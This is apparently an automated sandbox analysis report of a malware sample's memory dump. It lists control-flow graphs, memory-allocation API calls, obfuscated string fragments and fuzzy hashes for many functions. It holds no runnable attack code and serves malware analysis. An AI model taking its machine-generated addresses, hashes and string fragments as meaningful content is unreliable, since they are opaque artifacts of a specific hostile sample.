2c4c2ac-2c4c2ad 381->392 382->381 384 2c4c25a-2c4c25d 382->384 390 2c4c276-2c4c287 call 2c4bd56 384->390 391 2c4c25f-2c4c261 384->391 387->358 387->388 388->373 399 2c4c19e-2c4c1a4 388->399 405 2c4c298-2c4c2a3 call 2c4b822 390->405 406 2c4c289-2c4c295 call 2c4c335 390->406 391->390 395 2c4c263-2c4c266 391->395 396 2c4c2ae-2c4c2b5 392->396 408 2c4c1f1-2c4c1f5 393->408 409 2c4c213-2c4c24c 393->409 400 2c4c26d-2c4c274 call 2c4cf03 395->400 401 2c4c268-2c4c26b 395->401 396->358 402 2c4c2b7 396->402 399->358 399->373 400->392 401->396 401->400 402->402 405->392 406->405 408->409 413 2c4c1f7-2c4c1fa 408->413 409->358 418 2c4c24e 409->418 413->377 417 2c4c1fc-2c4c211 call 2c4d784 413->417 417->418 418->377
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02C4BFDF
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 02C4C323
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2087232378-0
                                                                                                                        • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                        • Instruction ID: f46b3b12ee340b76a3d70879094fb18874a974e6f2c7ed2dc7a9a53972b9f89e
                                                                                                                        • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                        • Instruction Fuzzy Hash: 41B1D371501A02ABDB31AEA0CC80BABB7F9FF89714F14052BE95982160EF31E750DF91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 421 2c36932-2c36cf6 422 2c36cf8-2c36cfd 421->422 423 2c36cff-2c36d1a 422->423 424 2c36d1c-2c36d55 422->424 423->422 425 2c36d57-2c36d5f 424->425 426 2c36d61-2c36d73 425->426 427 2c36d75-2c36ddf 425->427 426->425 428 2c36de1-2c36de4 427->428 429 2c36e31-2c36e5f 428->429 430 2c36de6-2c36e2f 428->430 431 2c36e61-2c36e69 429->431 430->428 432 2c36e6b-2c36e7d 431->432 433 2c36e7f-2c36edd 431->433 432->431 434 2c36edf-2c36ee2 433->434 435 2c36ee4-2c36f0b 434->435 436 2c36f0d-2c36f32 434->436 435->434 437 2c36f34-2c36f37 436->437 438 2c36f61-2c36f64 437->438 439 2c36f39-2c36f5f 437->439 440 2c36f66-2c36f6c 438->440 439->437 441 2c36f73-2c36f85 440->441 442 2c36f6e 440->442 444 2c36f87 441->444 445 2c36f89-2c36f8f 441->445 443 2c37004-2c37037 442->443 447 2c36ff5-2c36ff8 444->447 446 2c36f91-2c36ff2 call 2c3c242 445->446 445->447 446->447 449 2c36ffa 447->449 450 2c36ffc-2c36fff 447->450 449->443 450->440
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !$"$"$#$#$#$$$%$'$)$)$+$+$-$/$1$3$4$4$5$6$7$7$7$8$9$;$<$=$?$@$A$A$C$D$E$E$E$G$I$J$K$L$M$O$P$Q$Q$R$S$T$U$W$W$W$Y$Z$[$\$\$\$]$]$_$a$c$d$e$g$i$i$k$m$n$o$o$o$q$s$s$u$w$w$w$x$y$y${$|$}$}$}$~
                                                                                                                        • API String ID: 0-1234770202
                                                                                                                        • Opcode ID: e4c484c972bc86fa625bddb783114b0d15e3cd02282268cec38dedbdfa68f213
                                                                                                                        • Instruction ID: 169ce8badbe466e4dfb4dc8d063090f7b1a71c8b0aec2c9e2c4a0633f97ba717
                                                                                                                        • Opcode Fuzzy Hash: e4c484c972bc86fa625bddb783114b0d15e3cd02282268cec38dedbdfa68f213
                                                                                                                        • Instruction Fuzzy Hash: F622042090C7E9CDDB22C6688C487DDBFB15B56318F0846D9C1DD6B2D2C7B90B89CB66

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 470 2c359c2-2c35b20 471 2c35b22-2c35b25 470->471 472 2c35b27-2c35b7c 471->472 473 2c35b7e-2c35bbb 471->473 472->471 474 2c35bbd-2c35bc5 473->474 475 2c35bc7-2c35bd9 474->475 476 2c35bdb-2c35c45 474->476 475->474 477 2c35c47-2c35c4a 476->477 478 2c35c63-2c35c91 477->478 479 2c35c4c-2c35c61 477->479 480 2c35c93-2c35c9b 478->480 479->477 481 2c35cb1-2c35d0d 480->481 482 2c35c9d-2c35caf 480->482 483 2c35d0f-2c35d12 481->483 482->480 484 2c35d98-2c35db7 483->484 485 2c35d18-2c35d93 483->485 486 2c35db9-2c35dbc 484->486 485->483 487 2c35de6-2c35de9 486->487 488 2c35dbe-2c35de4 486->488 489 2c35deb-2c35df1 487->489 488->486 490 2c35df3 489->490 491 2c35df8-2c35e0a 489->491 492 2c35e7d-2c35ea0 490->492 493 2c35e0e-2c35e14 491->493 494 2c35e0c 491->494 495 2c35e6e-2c35e71 493->495 496 2c35e16-2c35e6b call 2c3c242 493->496 494->495 498 2c35e73 495->498 499 2c35e75-2c35e78 495->499 496->495 498->492 499->489
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $"$"$#$$$&$($0$<$>$P$R$S$T$X$Z$\$^$`$b$d$f$h$j$l$n$o$p$r$t$v$x$z$|$~
                                                                                                                        • API String ID: 0-1210510916
                                                                                                                        • Opcode ID: ada8a240c82e9bc6c498edaa3bd0fe067ec3ae45158ebd87eb671413efb06a7b
                                                                                                                        • Instruction ID: 1f65a5258aec8b109c08c0f051b8ce3ad77926f30f36da8bb717af5c4c4e8762
                                                                                                                        • Opcode Fuzzy Hash: ada8a240c82e9bc6c498edaa3bd0fe067ec3ae45158ebd87eb671413efb06a7b
                                                                                                                        • Instruction Fuzzy Hash: 79E1AF21D087E98ADB22C67C8C483CDBFA15B56324F1843D9C4E9AB3D6C7B54A45CB61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 511 2c10f18-2c10f32 512 2c10f36-2c10f39 511->512 513 2c10f94-2c10fba call 2c03572 512->513 514 2c10f3b-2c10f92 512->514 518 2c10fc1-2c10fd9 513->518 519 2c10fbc 513->519 514->512 521 2c10fdb-2c10fde 518->521 520 2c112b0 519->520 522 2c13299 520->522 523 2c10fe4-2c11063 521->523 524 2c11068-2c1108c call 2c03572 521->524 525 2c1329b-2c1329e call 2c03672 522->525 523->521 529 2c11093-2c110ab 524->529 530 2c1108e 524->530 534 2c10331-2c132af 525->534 535 2c10338-2c10360 call 2c03682 525->535 532 2c110ad-2c110b0 529->532 530->520 536 2c110b2-2c110d3 532->536 537 2c110d5-2c110f9 call 2c03572 532->537 543 2c10362-2c10365 535->543 536->532 544 2c11100-2c11118 537->544 545 2c110fb 537->545 546 2c10367-2c103ab 543->546 547 2c103ad-2c103d7 call 2c03572 543->547 548 2c1111a-2c1111d 544->548 545->520 546->543 555 2c103d9-2c103f8 547->555 556 2c103db 547->556 549 2c11146-2c11165 call 2c03572 548->549 550 2c1111f-2c11144 548->550 549->520 557 2c1116b-2c11183 549->557 550->548 560 2c103fa-2c103fd 555->560 556->525 559 2c11185-2c11188 557->559 561 2c1118a-2c111fa 559->561 562 2c111fc-2c1121b call 2c03572 559->562 563 2c1042b-2c1047c call 2c030b2 560->563 564 2c103ff-2c10429 560->564 561->559 562->520 570 2c11221-2c11247 562->570 563->522 569 2c10482-2c10489 563->569 564->560 569->522 571 2c11249-2c1124c 570->571 572 2c1127f-2c112a8 call 2c03572 571->572 573 2c1124e-2c1127d 571->573 572->522 576 2c112ae-2c112cd 572->576 573->571 578 2c112cf-2c112d2 576->578 579 2c112d4-2c112e6 578->579 580 2c112e8-2c1131b call 2c02fb2 578->580 579->578 583 2c1131d-2c11320 580->583 584 2c11322-2c11378 583->584 585 2c1137a-2c113ad call 2c02fb2 583->585 584->583 588 2c113af-2c113b2 585->588 589 2c113b4-2c113c9 588->589 590 2c113cb-2c113fe call 2c031c2 588->590 589->588 593 2c11400-2c11403 590->593 594 2c11440-2c11473 call 2c02fb2 593->594 595 2c11405-2c1143e 593->595 598 2c11475-2c11478 594->598 595->593 599 2c114d6-2c1154f call 2c030b2 598->599 600 2c1147a-2c114d4 598->600 603 2c11551-2c11554 599->603 600->598 604 2c11582-2c11604 call 2c030b2 call 2c15322 603->604 605 2c11556-2c11580 603->605 610 2c11606 604->610 611 2c11608-2c11698 call 2c096b2 call 2c0ba82 call 2c3a9a2 call 2c096c2 call 2c3ac12 604->611 605->603 610->611 623 2c1169a 611->623 624 2c1169f-2c116e6 611->624 625 2c11d0e-2c11d1a call 2c3ad52 623->625 626 2c116e8-2c116eb 624->626 625->522 628 2c11741-2c11748 626->628 629 2c116ed-2c1173f 626->629 631 2c1174a-2c11750 628->631 629->626 632 2c11752-2c11757 631->632 633 2c1175c-2c11771 631->633 634 2c117df-2c117e2 632->634 635 2c11773 633->635 636 2c11775-2c11780 633->636 637 2c117e4 634->637 638 2c117e6-2c11814 634->638 639 2c117d0-2c117d3 635->639 636->639 640 2c11782-2c117cb call 2c3c242 636->640 637->638 641 2c11816-2c11819 638->641 643 2c117d5-2c117d8 639->643 644 2c117dd 639->644 640->639 645 2c11851-2c11862 641->645 646 2c1181b-2c1184f 641->646 643->631 644->634 648 2c11868-2c118ce call 2c3a952 645->648 649 2c11d0c 645->649 646->641 652 2c118d0-2c118d3 648->652 649->625 653 2c118d5-2c11927 652->653 654 2c11929-2c11930 652->654 653->652 655 2c11932-2c1193d 654->655 656 2c11944-2c11959 655->656 657 2c1193f 655->657 659 2c1195b 656->659 660 2c1195d-2c11968 656->660 658 2c119ca-2c119cd 657->658 663 2c119d1-2c119d4 658->663 664 2c119cf 658->664 661 2c119bb-2c119be 659->661 660->661 662 2c1196a-2c119b6 call 2c3c242 660->662 666 2c119c0 661->666 667 2c119c2-2c119c5 661->667 662->661 668 2c11cf5-2c11d08 call 2c3a972 663->668 669 2c119da-2c11a15 call 2c15322 663->669 664->663 666->658 667->655 668->649 675 2c11a17 669->675 676 2c11a19-2c11a64 call 2c096b2 call 2c0ba82 669->676 675->676 681 2c11a66-2c11a68 676->681 682 2c11a79-2c11a7b 681->682 683 2c11a6a-2c11a70 681->683 686 2c11a7d-2c11aa8 682->686 684 2c11a72 683->684 685 2c11a74-2c11a77 683->685 684->686 685->681 687 2c11aaa 686->687 688 2c11aac-2c11b17 call 2c096b2 call 2c153a2 call 2c0af92 call 2c096c2 686->688 687->688 698 2c11b19 688->698 699 2c11b1b-2c11b68 call 2c096b2 call 2c38e72 call 2c096c2 call 2c15322 688->699 698->699 709 2c11b6a 699->709 710 2c11b6c-2c11bb2 call 2c096b2 call 2c0ba82 call 2c0a152 699->710 709->710 717 2c11bb4-2c11bc5 call 2c03672 710->717 720 2c11bc7-2c11cf0 call 2c096c2 * 2 call 2c0ab42 call 2c0a232 717->720 721 2c11bcc-2c11bf6 call 2c03652 call 2c03092 717->721 720->668 730 2c11bf8-2c11c2d call 2c15322 721->730 731 2c11bfa 721->731 740 2c11c31-2c11caf call 2c096b2 call 2c0ba82 call 2c22412 call 2c096c2 730->740 741 2c11c2f 730->741 734 2c11cb1-2c11cb4 731->734 734->717 740->734 741->740
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: '$($+$/$5$>$C$_$a$h$p${$3|b
                                                                                                                        • API String ID: 0-3234521255
                                                                                                                        • Opcode ID: ed02e301070f0e013cbc597596666269a1c3d701abaa35979906261e8b28edc3
                                                                                                                        • Instruction ID: e8ac6fd0a81c4386784260a65d87a7765a9a356ecc5b6eb996bf5d1697057d88
                                                                                                                        • Opcode Fuzzy Hash: ed02e301070f0e013cbc597596666269a1c3d701abaa35979906261e8b28edc3
                                                                                                                        • Instruction Fuzzy Hash: 9582917160C7908BC728DB38C4953AEBBE2ABC6324F098A6DD5ED873C1D6798541DB43

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 753 2c11d1f-2c11d37 754 2c11d39-2c11d3c 753->754 755 2c11d90-2c11dc4 call 2c02fb2 754->755 756 2c11d3e-2c11d8e 754->756 759 2c11dcb-2c11dce 755->759 756->754 760 2c11dd0-2c11e14 759->760 761 2c11e16-2c11e41 call 2c02fb2 759->761 760->759 764 2c11e43-2c11e78 call 2c15322 761->764 765 2c11e45 761->765 773 2c11e7a 764->773 774 2c11e7c-2c11ec4 call 2c096b2 call 2c0ba82 764->774 767 2c12868 765->767 769 2c13299 767->769 770 2c1329b-2c1329e call 2c03672 769->770 779 2c10331-2c132af 770->779 780 2c10338-2c10360 call 2c03682 770->780 773->774 785 2c11ec6-2c11ec9 774->785 789 2c10362-2c10365 780->789 787 2c11ecb-2c11f1d 785->787 788 2c11f1f-2c11f43 call 2c02fb2 785->788 787->785 795 2c11fa3-2c11fd2 call 2c15322 788->795 796 2c11f45-2c11f72 call 2c15322 788->796 791 2c10367-2c103ab 789->791 792 2c103ad-2c103d7 call 2c03572 789->792 791->789 799 2c103d9-2c103f8 792->799 800 2c103db 792->800 805 2c11fd4 795->805 806 2c11fd6-2c12077 call 2c096b2 call 2c0ba82 795->806 807 2c11f74 796->807 808 2c11f76-2c11f9f call 2c096b2 call 2c0ba82 796->808 809 2c103fa-2c103fd 799->809 800->770 805->806 824 2c12079-2c1207c 806->824 807->808 808->795 812 2c1042b-2c1047c call 2c030b2 809->812 813 2c103ff-2c10429 809->813 812->769 820 2c10482-2c10489 812->820 813->809 820->769 825 2c120d2-2c120db 824->825 826 2c1207e-2c120d0 824->826 827 2c120f3-2c1210c 825->827 828 2c120dd-2c120ee call 2c096c2 825->828 826->824 829 2c12110-2c12165 call 2c096b2 827->829 830 2c1210e 827->830 836 2c12866 828->836 838 2c12167-2c12186 call 2c096c2 * 2 829->838 839 2c1218b-2c121bb call 2c096c2 829->839 830->829 836->767 858 2c12864 838->858 846 2c121bd-2c121c0 839->846 848 2c121c2-2c12213 846->848 849 2c12215-2c1223d call 2c02fb2 846->849 848->846 855 2c12293-2c122ab 849->855 856 2c1223f-2c12260 call 2c15322 849->856 859 2c122ad-2c122b0 855->859 865 2c12262 856->865 866 2c12264-2c12291 call 2c096b2 call 2c0ba82 856->866 858->836 861 2c122b2-2c122ed 859->861 862 2c122ef-2c12335 call 2c032c2 859->862 861->859 869 2c12337-2c1233a 862->869 865->866 866->855 872 2c123ab-2c123cf call 2c031c2 869->872 873 2c1233c-2c123a9 869->873 877 2c12710-2c127aa call 2c0a152 call 2c16882 call 2c0ab42 872->877 878 2c123d5-2c12400 call 2c03672 872->878 873->869 895 2c127f0-2c12821 call 2c096c2 * 2 877->895 896 2c127ac-2c127bb 877->896 883 2c12402 878->883 884 2c12404-2c12424 call 2c096b2 878->884 883->884 890 2c12426-2c1242d 884->890 891 2c1244a-2c12453 884->891 893 2c1242f-2c1243b call 2c15462 890->893 894 2c12455-2c12457 891->894 909 2c1243d-2c12448 893->909 899 2c12465-2c1249d call 2c03682 894->899 900 2c12459-2c12460 894->900 926 2c12823-2c1282f call 2c096c2 895->926 927 2c12834-2c12841 895->927 901 2c127e4-2c127ec call 2c096c2 896->901 902 2c127bd-2c127c4 896->902 915 2c1249f-2c124a2 899->915 900->877 901->895 907 2c127c6-2c127de call 2c15602 902->907 918 2c127e0 907->918 919 2c127e2 907->919 909->891 916 2c124a4-2c124cb 915->916 917 2c124cd-2c12501 call 2c02fb2 915->917 916->915 925 2c12503-2c12506 917->925 918->907 919->901 930 2c12508-2c12528 925->930 931 2c1252a-2c12571 call 2c02fb2 925->931 926->927 928 2c12843-2c12854 call 2c096c2 927->928 929 2c12856-2c12862 call 2c0a232 927->929 928->929 929->858 930->925 941 2c12575-2c12578 931->941 942 2c12628-2c12673 call 2c032c2 941->942 943 2c1257e-2c12623 941->943 946 2c12675-2c12678 942->946 943->941 947 2c12697-2c1270b call 2c032c2 call 2c15482 946->947 948 2c1267a-2c12695 946->948 947->894 948->946
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: &$0$5$7'*e$7'*e$8$<$S$U$b$f$f$q
                                                                                                                        • API String ID: 0-371082485
                                                                                                                        • Opcode ID: 06b743e0306f1f25e9d7190c0326c14ba613b2cd28404c7c49bcb6fc4e6f96b9
                                                                                                                        • Instruction ID: c03bd33660a167f9b2534889c126815c510e2c2f67106499f12b16dce3ced7d7
                                                                                                                        • Opcode Fuzzy Hash: 06b743e0306f1f25e9d7190c0326c14ba613b2cd28404c7c49bcb6fc4e6f96b9
                                                                                                                        • Instruction Fuzzy Hash: F262B37660C3908FC324DB79C4953AEBBE2AFC6314F09896ED8D987381D6788945DB43
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: *$-$/$?$H$T$`$e$e$o$q
                                                                                                                        • API String ID: 0-2651190063
                                                                                                                        • Opcode ID: a116cc1b4f454f2e3750b8db1752d0c6e5fa70b89d12b9b897069f7db9646bf2
                                                                                                                        • Instruction ID: a5e7714eb7aaabbc2671b09613cd7ad31a040a57511936bcb9962f5e3235ebb9
                                                                                                                        • Opcode Fuzzy Hash: a116cc1b4f454f2e3750b8db1752d0c6e5fa70b89d12b9b897069f7db9646bf2
                                                                                                                        • Instruction Fuzzy Hash: AE71E36260D7E14AD302863C485825BEFD20BD7124F1DCEADE4F6973D6C565C50AC3A3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 5$ED71$O[KO$PM=j$RS[\$USA\$W^SC$nonj$o{ko$thmm
                                                                                                                        • API String ID: 0-1288658654
                                                                                                                        • Opcode ID: dad8a5b674040313a179e4f9d4d047f6e50ed6098efa63a53b0105a38dde88ff
                                                                                                                        • Instruction ID: e9fa33b9a0d97330cd77fd6d3811c68d84bc2ec825e0a5602097d921744c67c6
                                                                                                                        • Opcode Fuzzy Hash: dad8a5b674040313a179e4f9d4d047f6e50ed6098efa63a53b0105a38dde88ff
                                                                                                                        • Instruction Fuzzy Hash: 9362047160C3818FC325CF28C85166EBBE2AFD6204F188A6DE4E58B791D7758A06DB52
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !@$'$($)$,$H$v$y$y$~
                                                                                                                        • API String ID: 0-501951352
                                                                                                                        • Opcode ID: acd066e3e8fad2943d9dae06d4d13c20d84892f9a5f948f9ec78ad392d8f70f9
                                                                                                                        • Instruction ID: 787c489a4c412f31348dea2958f7dfa435cd77bea63d374a60abacfa606a9bc0
                                                                                                                        • Opcode Fuzzy Hash: acd066e3e8fad2943d9dae06d4d13c20d84892f9a5f948f9ec78ad392d8f70f9
                                                                                                                        • Instruction Fuzzy Hash: A422B13150C7908FD3249F39C89436EBBE1ABC6324F084A6DE8D697391DB798949CB53
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: B>D0$F67H$H2V4$Y.X $^"Q$$^&K8$w*N,$z:D<
                                                                                                                        • API String ID: 0-1427726062
                                                                                                                        • Opcode ID: a36f89fdf949c2b2d0b2dfd57a5da068a1343a1c4f5c19181d17b6685aa8ec67
                                                                                                                        • Instruction ID: c145470f40552eeba1911205eb19f618cf2becae0acc3f13ec483b3c643d6f4d
                                                                                                                        • Opcode Fuzzy Hash: a36f89fdf949c2b2d0b2dfd57a5da068a1343a1c4f5c19181d17b6685aa8ec67
                                                                                                                        • Instruction Fuzzy Hash: 6761ABB250C3409FD704DFA8984296FFBE2AFD2314F48DC2CE0E59B252D279C2159B96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 7$8$E$O$S$m$s
                                                                                                                        • API String ID: 0-1427716340
                                                                                                                        • Opcode ID: bf0ffff0d345008779848fcd3645218e27794a78e04a67ca06cc25071641339a
                                                                                                                        • Instruction ID: fe8fd476ab1903e502f8462b338fc935aee61aafdd242941a1cb7d600cd608d3
                                                                                                                        • Opcode Fuzzy Hash: bf0ffff0d345008779848fcd3645218e27794a78e04a67ca06cc25071641339a
                                                                                                                        • Instruction Fuzzy Hash: 5F129D7560C7908BD364EF38C4953AEBBE2ABC6320F144A2EE8E9873D1D6748445DB53
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #"$8#$IK$MO$QS$|Q$|Q
                                                                                                                        • API String ID: 0-3678875208
                                                                                                                        • Opcode ID: ced6022b84fdc683db781b70ad20aa24e11df5a09634e33c7e725272b9825eca
                                                                                                                        • Instruction ID: 7380e0bc9a533df0b7e05ed38d69aaa6273d7d0c94f607ea67bedec0ee42f87a
                                                                                                                        • Opcode Fuzzy Hash: ced6022b84fdc683db781b70ad20aa24e11df5a09634e33c7e725272b9825eca
                                                                                                                        • Instruction Fuzzy Hash: B0B11CB4915344DFE354EF52A889FA57EB0BB42340F5A86E8D0982F376D7309405CFA6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: t$#?#$-1/($31-0$40&2$q
                                                                                                                        • API String ID: 0-1393827883
                                                                                                                        • Opcode ID: 753a81982b1a8375ebd1d3a054f8bb7a5a991ad253d20124faceb6fc01940a8f
                                                                                                                        • Instruction ID: 72430f2ab3bdc64f17a3f64ab64181449def35151b27468fc80b8c3c00104726
                                                                                                                        • Opcode Fuzzy Hash: 753a81982b1a8375ebd1d3a054f8bb7a5a991ad253d20124faceb6fc01940a8f
                                                                                                                        • Instruction Fuzzy Hash: 1151F52054D3D18AC3118F7994E03AAFFE0AFE3654F18456DE8D10B382C729861EDB66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: +I3$8L{z$UUSi$b ]]$b``T$|_hX
                                                                                                                        • API String ID: 0-2898248994
                                                                                                                        • Opcode ID: 80c391b0ace235ff5cb1c1327da06a32c29fb5435f5b2cf83f01032ca6e6348b
                                                                                                                        • Instruction ID: ad20952dd62a42aefc58672c86a50947627709764cba2851dae9875b41c59243
                                                                                                                        • Opcode Fuzzy Hash: 80c391b0ace235ff5cb1c1327da06a32c29fb5435f5b2cf83f01032ca6e6348b
                                                                                                                        • Instruction Fuzzy Hash: AB21AD716483908FD3154F2980913AAFFE0EBC2714F149A6CE4D557781D379C94ACB52
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 1>V$5>V$C$VwRy$8
                                                                                                                        • API String ID: 0-2379611800
                                                                                                                        • Opcode ID: 6bac0098d99f0d5117e4f448402f5eeef7e7d42ba887dc389996246132827263
                                                                                                                        • Instruction ID: 0d64b980ea5582d0f0344f961e02e3be3aab7098c1c320363ec7e40450fa94ac
                                                                                                                        • Opcode Fuzzy Hash: 6bac0098d99f0d5117e4f448402f5eeef7e7d42ba887dc389996246132827263
                                                                                                                        • Instruction Fuzzy Hash: F012DBB2A083408BD310CF65C884B5BBBE6FFC5714F148A2DFA959B390D775D9098B92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @Z$E_$PG$|}$}
                                                                                                                        • API String ID: 0-2495506168
                                                                                                                        • Opcode ID: 2c98ca4ce7670e303f3b7e21aa3a2113c940a07082853d19c00f11f439564cc5
                                                                                                                        • Instruction ID: b36d413369edd3d5a3904db4360a7c5a4dbd8d586f5f79315e091fefc6b26541
                                                                                                                        • Opcode Fuzzy Hash: 2c98ca4ce7670e303f3b7e21aa3a2113c940a07082853d19c00f11f439564cc5
                                                                                                                        • Instruction Fuzzy Hash: E8B10FB164C3408FD318DF659890AABBBF5EFD2314F14492DE1E28B391D639D60ACB16
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L[$PH$X\$e`.-$lbi`
                                                                                                                        • API String ID: 0-1661579417
                                                                                                                        • Opcode ID: ca685cd46ad8921f7597725b7c27d83404727ea77bb20cc563adbfb3b151aa4b
